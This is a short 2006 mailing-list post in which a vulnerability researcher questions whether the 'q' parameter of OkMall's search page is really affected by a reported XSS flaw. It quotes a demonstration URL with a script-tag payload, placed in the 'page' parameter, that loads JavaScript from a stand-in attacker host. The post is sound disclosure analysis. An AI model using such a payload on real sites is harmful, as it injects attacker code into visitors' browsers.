[VIM] OkMall - "q" parameter not affected?
Steven M. Christey
coley at mitre.org
Mon Jun 12 20:21:59 EDT 2006
Ref:
BUGTRAQ:20060608 okscripts.com - XSS Vulns
URL:http://www.securityfocus.com/archive/1/436561
Some vdb's are reporting "q" parameter as affected.
Relevant demonstration URL is:
okmall/demo/search.php?q=a%20%20b%20e%20&mcdir=5&
page=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
So the "q" value is:
a%20%20b%20e%20
which, when decoded, is just a bunch of whitespace:
a b e
Thoughts? Did someone do post-disclosure analysis on this one?
- Steve
More information about the VIM
mailing list